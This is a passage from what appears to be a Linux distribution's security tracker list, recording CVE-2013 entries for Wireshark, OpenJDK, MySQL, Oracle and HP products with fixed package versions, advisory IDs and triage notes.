	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
	NOTE: Not suitable for code injection
CVE-2013-2480 (The RTPS and RTPS2 dissectors in Wireshark 1.6.x before 1.6.14 and 1.8 ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-15.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8332
	NOTE: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
CVE-2013-2479 (The dissect_mpls_echo_tlv_dd_map function in epan/dissectors/packet-mp ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only affecting 1.8.x)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-14.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8039
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2478 (The dissect_server_info function in epan/dissectors/packet-ms-mms.c in ...)
	{DSA-2644-1}
	- wireshark 1.8.2-5
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-13.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8382
	NOTE: announce mentions: Versions affected: 1.8.0 to 1.8.5, 1.6.0 to 1.6.13
CVE-2013-2477 (The CSN.1 dissector in Wireshark 1.8.x before 1.8.6 does not properly ...)
	- wireshark 1.8.2-5
	[squeeze] - wireshark (only affecting 1.8.x)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-12.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8383
	NOTE: Versions affected: 1.8.0 to 1.8.5
CVE-2013-2476 (The dissect_hartip function in epan/dissectors/packet-hartip.c in the ...)
	{DLA-497-1}
	- wireshark 1.8.6-1 (unimportant)
	[squeeze] - wireshark (only affecting 1.8.x)
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-11.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8360
	NOTE: Versions affected: 1.8.0 to 1.8.5
	NOTE: Not suitable for code injection
CVE-2013-2475 (The TCP dissector in Wireshark 1.8.x before 1.8.6 allows remote attack ...)
	- wireshark 1.8.2-5
	[squeeze] - wireshark (only affecting 1.8.x)
	[wheezy] - wireshark 1.8.2-5wheezy1
	NOTE: http://www.wireshark.org/security/wnpa-sec-2013-10.html
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8274
	NOTE: Versions affected: 1.8.0 to 1.8.5
CVE-2013-2474 (Directory traversal vulnerability in AWS XMS 2.5 allows remote attacke ...)
	NOT-FOR-US: AWS XMS
CVE-2013-2473 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2472 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2471 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2470 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2469 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2468 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2467 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 5)
	- openjdk-7 (Only affects Java 5)
CVE-2013-2466 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2465 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2464 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2463 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2462 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2461 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2460 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2722-1}
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2459 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2458 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2722-1}
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2457 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 (Only applies to Java 7)
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2456 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2455 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2454 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2722-1}
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2453 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-7 7u25-2.3.10-1
	- openjdk-6 6b27-1.12.6-1
CVE-2013-2452 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2451 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2450 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2449 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2722-1}
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2448 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2447 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2446 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2445 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2444 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2443 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-7 7u25-2.3.10-1
	- openjdk-6 6b27-1.12.6-1
CVE-2013-2442 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2441 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-2440 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2439 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Installation performed differently for Linux distros)
	- openjdk-7 (Installation performed differently for Linux distros)
CVE-2013-2438 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2437 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2436 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java7)
CVE-2013-2435 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2434 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2433 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2432 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2431 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java7)
CVE-2013-2430 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2429 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2428 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2427 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2426 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java 7)
CVE-2013-2425 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only applies to Java 7)
	- openjdk-7 (Installation performed differently for Linux distros)
CVE-2013-2424 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2423 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only applies to Java 7)
CVE-2013-2422 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2421 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 (Only affects Java 7)
CVE-2013-2420 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2419 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-3187-1 DLA-219-1}
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
	- icu 52.1-1
CVE-2013-2418 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2417 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-2416 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2415 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 7)
CVE-2013-2414 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-2413 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2412 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-7 7u25-2.3.10-1
	- openjdk-6 6b27-1.12.6-1
CVE-2013-2411 (Unspecified vulnerability in the Primavera P6 Enterprise Project Portf ...)
	NOT-FOR-US: Oracle Primavera Products
CVE-2013-2410 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2409 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2408 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2407 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-2727-1 DSA-2722-1}
	- openjdk-6 6b27-1.12.6-1
	- openjdk-7 7u25-2.3.10-1
CVE-2013-2406 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2405 (Unspecified vulnerability in the Primavera P6 Enterprise Project Portf ...)
	NOT-FOR-US: Oracle Primavera Products
CVE-2013-2404 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2403 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2402 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2401 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2400 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-2399 (Unspecified vulnerability in the Siebel Call Center component in Oracl ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2398 (Unspecified vulnerability in the Siebel UI Framework component in Orac ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-2397 (Unspecified vulnerability in the Oracle Retail Central Office componen ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-2396 (Unspecified vulnerability in the Oracle Applications Manager component ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-2395 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...)
	- mysql-5.5 (Only affects MySQL 5.6)
	- mysql-5.1 (Only affects MySQL 5.6)
CVE-2013-2394 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-2393 (Unspecified vulnerability in the Oracle Outside In Technology componen ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-2392 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...)
	{DSA-2780-1 DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-2391 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...)
	{DSA-2780-1 DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-2390 (Unspecified vulnerability in the Oracle WebLogic Server component in O ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-2389 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...)
	{DSA-2780-1 DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
CVE-2013-2388 (Unspecified vulnerability in the Oracle Applications Technology Stack ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-2387 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2386 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2385 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2384 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-3187-1 DLA-219-1}
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
	- icu 52.1-1
CVE-2013-2383 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	{DSA-3187-1 DLA-219-1}
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
	- icu 52.1-1
CVE-2013-2382 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2381 (Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows re ...)
	- mysql-5.1 (Only affects MySQL 5.6)
	- mysql-5.5 (Only affects MySQL 5.6)
CVE-2013-2380 (Unspecified vulnerability in the Oracle JRockit component in Oracle Fu ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-2379 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2378 (Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 a ...)
	{DSA-2780-1}
	- mysql-5.5 5.5.30+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-2377 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking compon ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2013-2376 (Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.1 ...)
	{DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1 (Only affects MySQL 5.5 and 5.6)
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-2375 (Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 a ...)
	{DSA-2780-1 DSA-2667-1}
	- mysql-5.5 5.5.31+dfsg-1
	- mysql-5.1
	- mariadb-10.0 (Fixed before initial upload)
	- mariadb-5.5 (Fixed before initial upload)
CVE-2013-2374 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-2373 (The Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x befo ...)
	NOT-FOR-US: TIBCO Spotfire Web Player
CVE-2013-2372 (Cross-site scripting (XSS) vulnerability in the Engine in TIBCO Spotfi ...)
	NOT-FOR-US: TIBCO Spotfire Web Player
CVE-2013-2371 (The Web API in the Statistics Server in TIBCO Spotfire Statistics Serv ...)
	NOT-FOR-US: TIBCO Spotfire Statistics
CVE-2013-2370 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-2369 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-2368 (Unspecified vulnerability in HP LoadRunner before 11.52 allows remote ...)
	NOT-FOR-US: HP LoadRunner
CVE-2013-2367 (Multiple unspecified vulnerabilities in HP SiteScope 11.20 and 11.21, ...)
	NOT-FOR-US: HP SiteScope
CVE-2013-2366 (Unspecified vulnerability in HP Business Process Monitor 9.13.1 patch ...)
	NOT-FOR-US: HP Business Process Monitor
CVE-2013-2365 (HP Database and Middleware Automation (DMA) 10.x before 10.10, when SS ...)
	NOT-FOR-US: HP DMA
CVE-2013-2364 (Cross-site scripting (XSS) vulnerability in HP System Management Homep ...)
	NOT-FOR-US: HP SMH
CVE-2013-2363 (HP System Management Homepage (SMH) before 7.2.1 allows remote attacke ...)
	NOT-FOR-US: HP SMH
CVE-2013-2362 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP SMH
CVE-2013-2361 (Cross-site scripting (XSS) vulnerability in HP System Management Homep ...)
	NOT-FOR-US: HP SMH
CVE-2013-2360 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP SMH
CVE-2013-2359 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP SMH
CVE-2013-2358 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP SMH
CVE-2013-2357 (Unspecified vulnerability in HP System Management Homepage (SMH) befor ...)
	NOT-FOR-US: HP SMH
CVE-2013-2356 (HP System Management Homepage (SMH) before 7.2.1 allows remote attacke ...)
	NOT-FOR-US: HP SMH
CVE-2013-2355 (HP System Management Homepage (SMH) before 7.2.1 allows remote attacke ...)
	NOT-FOR-US: HP SMH
CVE-2013-2354
	REJECTED
CVE-2013-2353 (Unspecified vulnerability in HP StoreOnce D2D Backup System 1.x before ...)
	NOT-FOR-US: HP
CVE-2013-2352 (LeftHand OS (aka SAN iQ) 10.5 and earlier on HP StoreVirtual Storage d ...)
	NOT-FOR-US: HP
CVE-2013-2351 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.00, 9. ...)
	NOT-FOR-US: HP Network Node Manager
CVE-2013-2350 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: Data Protector
CVE-2013-2349 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: Data Protector
CVE-2013-2348 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: Data Protector
CVE-2013-2347 (The Backup Client Service (OmniInet.exe) in HP Storage Data Protector ...)
	NOT-FOR-US: Data Protector
CVE-2013-2346 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: Data Protector
CVE-2013-2345 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: Data Protector
CVE-2013-2344 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: Data Protector
CVE-2013-2343 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance hyd ...)
	NOT-FOR-US: HP
CVE-2013-2342 (The HP StoreOnce D2D backup system with software before 3.0.0 has a de ...)
	NOT-FOR-US: HP StoreOnce D2D backup system
CVE-2013-2341 (Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, J ...)
	NOT-FOR-US: HP
CVE-2013-2340 (Unspecified vulnerability on the HP ProCurve JC###A, JC###B, JD###A, J ...)
	NOT-FOR-US: HP
CVE-2013-2339 (HP Smart Zero Core 4.3 and 4.3.1 on the t410 All-in-One Smart Zero Cli ...)
	NOT-FOR-US: HP Smart Zero Client
CVE-2013-2338 (Unspecified vulnerability on HP Integrated Lights-Out 3 (aka iLO3) car ...)
	NOT-FOR-US: HP Integrated Lights-Out
CVE-2013-2337 (Cross-site scripting (XSS) vulnerability in HP Service Manager 7.11, 9 ...)
	NOT-FOR-US: HP Service Manager
CVE-2013-2336 (HP Service Manager 7.11, 9.21, 9.30, and 9.31, and ServiceCenter 6.2.8 ...)
	NOT-FOR-US: HP Service Manager
CVE-2013-2335 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2334 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2333 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2332 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2331 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2330 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2329 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2328 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2327 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2326 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2325 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2324 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, 7.0 ...)
	NOT-FOR-US: HP Storage Data Protector
CVE-2013-2323 (HP SQL/MX 3.0 through 3.2 on NonStop servers, when SQL/MP Objects are ...)
	NOT-FOR-US: HP
CVE-2013-2322 (HP SQL/MX 3.2 and earlier on NonStop servers, when SQL/MP Objects are ...)
	NOT-FOR-US: HP
CVE-2013-2321 (Cross-site scripting (XSS) vulnerability in HP Service Manager Web Tie ...)
	NOT-FOR-US: HP Service Manager
CVE-2013-2320
	RESERVED
CVE-2013-2319 (FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.5 ...)
	NOT-FOR-US: FileMaker Pro
CVE-2013-2318 (The Content Provider in the MovatwiTouch application before 1.793 and ...)
	NOT-FOR-US: MovatwiTouch
CVE-2013-2317 (The Sleipnir Mobile application 2.9.1 and earlier and Sleipnir Mobile ...)
	NOT-FOR-US: Sleipnir Mobile
CVE-2013-2316 (The Yahoo! Browser application 1.4.4 and earlier for Android allows re ...)
	NOT-FOR-US: Yahoo! Browser application for Android
CVE-2013-2315 (data/class/pages/forgot/LC_Page_Forgot.php in LOCKON EC-CUBE 2.11.0 th ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-2314 (Cross-site scripting (XSS) vulnerability in the adminAuthorization fun ...)
